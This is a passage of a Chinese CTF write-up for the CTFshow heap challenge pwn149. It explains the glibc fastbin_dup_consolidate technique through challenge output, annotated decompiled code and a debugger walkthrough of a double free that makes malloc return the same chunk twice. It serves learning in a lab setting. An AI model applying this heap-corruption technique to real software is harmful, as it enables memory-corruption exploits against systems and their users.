class=\"wp-block-heading\"><br>5\u3001pwn149\uff08fastbin_dup_consolidate\uff09<\/h2>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' 
data-fancybox='post-images' href='http:\/\/lycoreco.cn\/wp-content\/uploads\/2025\/12\/image-47-1024x594.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"594\" data-original=\"http:\/\/lycoreco.cn\/wp-content\/uploads\/2025\/12\/image-47-1024x594.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-772\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p><br>checksec<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/lycoreco.cn\/wp-content\/uploads\/2025\/12\/image-48-1024x441.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"441\" data-original=\"http:\/\/lycoreco.cn\/wp-content\/uploads\/2025\/12\/image-48-1024x441.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-773\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p><br>\u770b\u770b\u6f14\u793a\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>faetong@faetong-virtual-machine:~\/pwnit$ nc pwn.challenge.ctf.show 28199\n    \u2584\u2584\u2584\u2584   \u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584  
\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584            \u2584\u2584                           \n  \u2588\u2588\u2580\u2580\u2580\u2580\u2588  \u2580\u2580\u2580\u2588\u2588\u2580\u2580\u2580  \u2588\u2588\u2580\u2580\u2580\u2580\u2580\u2580            \u2588\u2588                           \n \u2588\u2588\u2580          \u2588\u2588     \u2588\u2588        \u2584\u2584\u2588\u2588\u2588\u2588\u2588\u2584  \u2588\u2588\u2584\u2588\u2588\u2588\u2588\u2584   \u2584\u2588\u2588\u2588\u2588\u2584  \u2588\u2588      \u2588\u2588\n \u2588\u2588           \u2588\u2588     \u2588\u2588\u2588\u2588\u2588\u2588\u2588   \u2588\u2588\u2584\u2584\u2584\u2584 \u2580  \u2588\u2588\u2580   \u2588\u2588  \u2588\u2588\u2580  \u2580\u2588\u2588 \u2580\u2588  \u2588\u2588  \u2588\u2580\n \u2588\u2588\u2584          \u2588\u2588     \u2588\u2588         \u2580\u2580\u2580\u2580\u2588\u2588\u2584  \u2588\u2588    \u2588\u2588  \u2588\u2588    \u2588\u2588  \u2588\u2588\u2584\u2588\u2588\u2584\u2588\u2588 \n  \u2588\u2588\u2584\u2584\u2584\u2584\u2588     \u2588\u2588     \u2588\u2588        \u2588\u2584\u2584\u2584\u2584\u2584\u2588\u2588  \u2588\u2588    \u2588\u2588  \u2580\u2588\u2588\u2584\u2584\u2588\u2588\u2580  \u2580\u2588\u2588  \u2588\u2588\u2580 \n    \u2580\u2580\u2580\u2580      \u2580\u2580     \u2580\u2580         \u2580\u2580\u2580\u2580\u2580\u2580   \u2580\u2580    \u2580\u2580    \u2580\u2580\u2580\u2580     \u2580\u2580  \u2580\u2580  \n    * *************************************                           \n    * Classify: CTFshow --- PWN --- \u5165\u95e8                              \n    * Type  : Heap_Exploitation                                       \n    * Site  : https:\/\/ctf.show\/                                       \n    * Hint  : Fastbin_dup_consolidate                                 \n    * *************************************                           \n\u7533\u8bf7\u4e24\u4e2a fastbin \u8303\u56f4\u5185\u7684 chunk: p1=0xcdd010 
p2=0xcdd030\n\u5148 free p1\n\u53bb\u7533\u8bf7 largebin \u5927\u5c0f\u7684 chunk\uff0c\u89e6\u53d1 malloc_consolidate(): p3=0xcdd050\n\u56e0\u4e3a malloc_consolidate(), p1 \u4f1a\u88ab\u653e\u5230 unsorted bin \u4e2d\n\u8fd9\u65f6\u5019 p1 \u4e0d\u5728 fastbin \u94fe\u8868\u7684\u5934\u90e8\u4e86\uff0c\u6240\u4ee5\u53ef\u4ee5\u518d\u6b21 free p1 \u9020\u6210 double free\n\u73b0\u5728 fastbin \u548c unsortedbin \u4e2d\u90fd\u653e\u7740 p1 \u7684\u6307\u9488\uff0c\u6240\u4ee5\u6211\u4eec\u53ef\u4ee5 malloc \u4e24\u6b21\u90fd\u5230 p1: 0xcdd010 0xcdd010\n$\n<\/code><\/pre>\n\n\n\n<p id=\"ua6c2101d\">\u4f3c\u4e4e\u4e5f\u662f\u53bb\u6784\u9020\u4e00\u4e2adouble free\u4f46\u662f\u7528\u7684\u65b9\u6cd5\u4e0d\u540c\uff0c\u5148\u770b\u770b\u4eba\u673a\u7684\u8bb2\u89e3\u7136\u540e\u6765\u8c03\u8bd5\u4e00\u4e0b\u7a0b\u5e8f<\/p>\n\n\n\n<p id=\"u64557898\">\u9996\u5148\u662fFastbin_dup_consolidate\u7684\u76ee\u7684<\/p>\n\n\n\n<p id=\"u67907dab\">\u8ba9\u540c\u4e00\u4e2a fastbin chunk\uff08\u4f8b\u5982 p1\uff09 <strong>\u65e2\u51fa\u73b0\u5728 fastbin \u94fe\u8868\u91cc\uff0c\u4e5f\u51fa\u73b0\u5728 unsorted bin \u91cc<\/strong>\uff0c\u4ece\u800c\u5728\u540e\u7eed <code>malloc()<\/code> \u65f6\u53ef\u4ee5\u8fde\u7eed\u4e24\u6b21\u5206\u914d\u5230\u540c\u4e00\u5757\u5185\u5b58\uff0c\u5b9e\u73b0 <strong>double malloc \u2192 double free \u2192 \u4efb\u610f\u5199 \/ \u5806\u5e03\u5c40\u63a7\u5236<\/strong>\u3002<\/p>\n\n\n\n<p id=\"udf3d93fa\">\u73b0\u5728\u8fd9\u4e2achunk\u4e0d\u4ec5\u4ec5\u51fa\u73b0\u5728fastbin\u91cc\uff0c\u8fd8\u51fa\u73b0\u5728<strong>unsorted bin\u91cc\uff0c<\/strong>malloc\u4e4b\u540e\u5c06\u4f1a\u8fde\u7eed\u4e24\u6b21\u5206\u914d\u5230\u540c\u4e00\u7247\u5185\u5b58<\/p>\n\n\n\n<p id=\"u6c229fc9\">\u56e0\u4e3a\u9700\u8981\u51fa\u53d1 malloc_consolidate() \uff0c\u8fd9\u662f\u4ec0\u4e48\u529f\u80fd\u5462<\/p>\n\n\n\n<p id=\"u242c1f29\">\u5f53\u89e6\u53d1\uff1a<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><code>malloc()<\/code> \u9700\u8981\u4ece top 
chunk \u62ff\u7a7a\u95f4\u4f46\u4e0d\u591f<\/li>\n\n\n\n<li>\u6216\u8005 <code>malloc_trim<\/code><\/li>\n\n\n\n<li>\u6216\u8005\u7533\u8bf7\u4e00\u4e2a <em>\u8fc7\u5927 chunk<\/em>\uff08\u89e6\u53d1\u6574\u7406\uff09<\/li>\n<\/ul>\n\n\n\n<p id=\"u824de5da\">\u4f1a\u5bf9 <strong>fastbin \u8fdb\u884c\u5408\u5e76\uff08consolidate\uff09<\/strong><br>\u2192 fastbin \u91cc\u6240\u6709 chunk \u4f1a\u88ab\u53d6\u51fa\u5e76\u653e\u8fdb unsorted bin\u3002<\/p>\n\n\n\n<p id=\"u23257687\">ok\uff0c\u63a5\u4e0b\u6765\u770b\u770b\u4ee3\u7801\u662f\u600e\u4e48\u5b9e\u73b0\u7684(\u5e26\u6ce8\u91ca)<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>void __cdecl demo()\n{\n  char *p1; \/\/ &#91;rsp+8h] &#91;rbp-28h]\n  char *p2; \/\/ &#91;rsp+10h] &#91;rbp-20h]\n  void *p3; \/\/ &#91;rsp+18h] &#91;rbp-18h]\n  _QWORD *p4; \/\/ &#91;rsp+20h] &#91;rbp-10h]\n  char *p5; \/\/ &#91;rsp+28h] &#91;rbp-8h]\n\n  \/\/\u521b\u5efachunk&#91;0]\n  p1 = (char *)malloc(0x10u);\t\n  strcpy(p1, \"AAAAAAAA\");\n\n  \/\/\u521b\u5efachunk&#91;1]\n  p2 = (char *)malloc(0x10u);\n  strcpy(p2, \"BBBBBBBB\");\n  fprintf(stderr, &amp;format_, p1, p2);\n  fwrite(&amp;ptr_, 1u, 0xCu, stderr);\n\n  \/\/free\u6389chunk&#91;0]\n  free(p1);\n\n  \/\/\u7533\u8bf7\u4e00\u4e2a\u66f4\u5927\u7684chunk&#91;2],\u89e6\u53d1 malloc_consolidate()\n  \/\/ glibc \u4f1a\u628a fastbin \u91cc\u7684 chunk\uff08\u5305\u62ec p1\uff09\u5168\u90e8\u642c\u5230 unsorted bin\n  p3 = malloc(0x400u);\n  fprintf(stderr, &amp;format__0, p3);\n  fwrite(&amp;ptr__0, 1u, 0x3Eu, stderr);\n\n  \/\/ \u6b64\u65f6 p1 \u5df2\u7ecf\u5728 unsorted bin \u4e2d\uff0c\u4e0d\u5728 fastbin \u5934\u90e8\uff0c\n  \/\/ \u56e0\u6b64 free(p1) \u4e0d\u4f1a\u89e6\u53d1 double free \u68c0\u6d4b\uff01\n  \/\/ free(p1) \u4f1a\u628a p1 \u518d\u6b21\u653e\u5165 fastbin\n  free(p1);\n  fwrite(&amp;ptr__1, 1u, 0x5Fu, stderr);\n\n  \/\/\u7533\u8bf7\u5c0f\u5757\uff0c\u8fd4\u56dep1\n  p4 = malloc(0x10u);\n  *p4 = 0x43434343434343LL;\n\n  
\/\/\u7533\u8bf7\u5c0f\u5757\uff0c\u540c\u6837\u8fd4\u56dep1\n  p5 = (char *)malloc(0x10u);\n  strcpy(p5, \"DDDDDDDD\");\n  fprintf(stderr, &amp;format__1, p4, p5);\n}<\/code><\/pre>\n\n\n\n<p id=\"u88b85f34\">\u73b0\u5728\u6765\u8c03\u8bd5\u7a0b\u5e8f<\/p>\n\n\n\n<p id=\"u092a9821\">\u5728demo\u6253\u4e2a\u65ad\u70b9run\u4e00\u4e0b\uff0c\u6211\u4eec\u628a\u4e24\u4e2amalloc\u6267\u884c\u5b8c<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/lycoreco.cn\/wp-content\/uploads\/2025\/12\/image-49.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"997\" height=\"764\" data-original=\"http:\/\/lycoreco.cn\/wp-content\/uploads\/2025\/12\/image-49.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-774\"  sizes=\"auto, (max-width: 997px) 100vw, 997px\" \/><\/div><\/figure>\n\n\n\n<p><br>\u63a5\u4e0b\u6765free chunk[0]<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/lycoreco.cn\/wp-content\/uploads\/2025\/12\/image-50-1024x178.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"178\" data-original=\"http:\/\/lycoreco.cn\/wp-content\/uploads\/2025\/12\/image-50-1024x178.png\" 
src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-775\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/lycoreco.cn\/wp-content\/uploads\/2025\/12\/image-51.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"977\" height=\"886\" data-original=\"http:\/\/lycoreco.cn\/wp-content\/uploads\/2025\/12\/image-51.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-776\"  sizes=\"auto, (max-width: 977px) 100vw, 977px\" \/><\/div><\/figure>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/lycoreco.cn\/wp-content\/uploads\/2025\/12\/image-52.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"589\" height=\"611\" data-original=\"http:\/\/lycoreco.cn\/wp-content\/uploads\/2025\/12\/image-52.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-777\"  
sizes=\"auto, (max-width: 589px) 100vw, 589px\" \/><\/div><\/figure>\n\n\n\n<p id=\"u62e2f45a\">chunk[0]\u5df2\u7ecf\u8fdb\u5165fastbin<\/p>\n\n\n\n<p id=\"u801b1e92\">\u63a5\u4e0b\u6765\u662f\u7533\u8bf7\u4e00\u4e2a\u66f4\u5927\u7684chunk[3]<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/lycoreco.cn\/wp-content\/uploads\/2025\/12\/image-53.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"916\" height=\"938\" data-original=\"http:\/\/lycoreco.cn\/wp-content\/uploads\/2025\/12\/image-53.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-778\"  sizes=\"auto, (max-width: 916px) 100vw, 916px\" \/><\/div><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/lycoreco.cn\/wp-content\/uploads\/2025\/12\/image-54-1024x360.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"360\" data-original=\"http:\/\/lycoreco.cn\/wp-content\/uploads\/2025\/12\/image-54-1024x360.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-779\"  sizes=\"auto, (max-width: 1024px) 
100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p><br>\u5947\u602a\uff0c\u4e3a\u4ec0\u4e48\u88ab\u5f52\u5728smallbin\u91cc\u9762\u4e86<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/lycoreco.cn\/wp-content\/uploads\/2025\/12\/image-55-1024x565.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"565\" data-original=\"http:\/\/lycoreco.cn\/wp-content\/uploads\/2025\/12\/image-55-1024x565.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-780\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p><br>\u4f46\u662f\u603b\u5f52\u662f\u4e0d\u5728fastbin\u91cc\u9762\u7684\uff0c\u6240\u4ee5\u7ee7\u7eedfree(p1)<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/lycoreco.cn\/wp-content\/uploads\/2025\/12\/image-56-1024x718.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"718\" data-original=\"http:\/\/lycoreco.cn\/wp-content\/uploads\/2025\/12\/image-56-1024x718.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-781\"  
sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p><br>\u867d\u7136\u662f\u5728smollbin\u4f46\u662f\u4e5f\u662f\u5f62\u6210\u4e86double free<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/lycoreco.cn\/wp-content\/uploads\/2025\/12\/image-57.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"981\" height=\"749\" data-original=\"http:\/\/lycoreco.cn\/wp-content\/uploads\/2025\/12\/image-57.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-782\"  sizes=\"auto, (max-width: 981px) 100vw, 981px\" \/><\/div><\/figure>\n\n\n\n<p id=\"u274fd974\">\u63a5\u4e0b\u6765\u5c31\u662f\u7533\u8bf7\u56de\u4e24\u4e2a\u5c0f\u5757<\/p>\n\n\n\n<p id=\"ua09b329d\">\u9996\u5148\u662f\u6536\u56defastbin\u4e2d\u7684chunk[0]<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/lycoreco.cn\/wp-content\/uploads\/2025\/12\/image-58-1024x941.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"941\" data-original=\"http:\/\/lycoreco.cn\/wp-content\/uploads\/2025\/12\/image-58-1024x941.png\" 
src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-783\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p><br>\u4e0b\u65b9\u53ef\u4ee5\u770b\u5230\u88ab\u6536\u56de\u4e86<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/lycoreco.cn\/wp-content\/uploads\/2025\/12\/image-59-1024x644.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"644\" data-original=\"http:\/\/lycoreco.cn\/wp-content\/uploads\/2025\/12\/image-59-1024x644.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-784\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p><br>\u63a5\u4e0b\u6765\u662f\u6536\u56desmollbin(\u539f\u672c\u662funstored bin)<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/lycoreco.cn\/wp-content\/uploads\/2025\/12\/image-60.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"872\" height=\"832\" data-original=\"http:\/\/lycoreco.cn\/wp-content\/uploads\/2025\/12\/image-60.png\" 
src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-785\"  sizes=\"auto, (max-width: 872px) 100vw, 872px\" \/><\/div><\/figure>\n\n\n\n<p><br>\u53ef\u4ee5\u53d1\u73b0\u5df2\u7ecf\u88ab\u7533\u8bf7\u56de\u6765\u4e86<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/lycoreco.cn\/wp-content\/uploads\/2025\/12\/image-61.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"384\" height=\"606\" data-original=\"http:\/\/lycoreco.cn\/wp-content\/uploads\/2025\/12\/image-61.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-786\"  sizes=\"auto, (max-width: 384px) 100vw, 384px\" \/><\/div><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/lycoreco.cn\/wp-content\/uploads\/2025\/12\/image-62-1024x395.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"395\" data-original=\"http:\/\/lycoreco.cn\/wp-content\/uploads\/2025\/12\/image-62-1024x395.png\" 
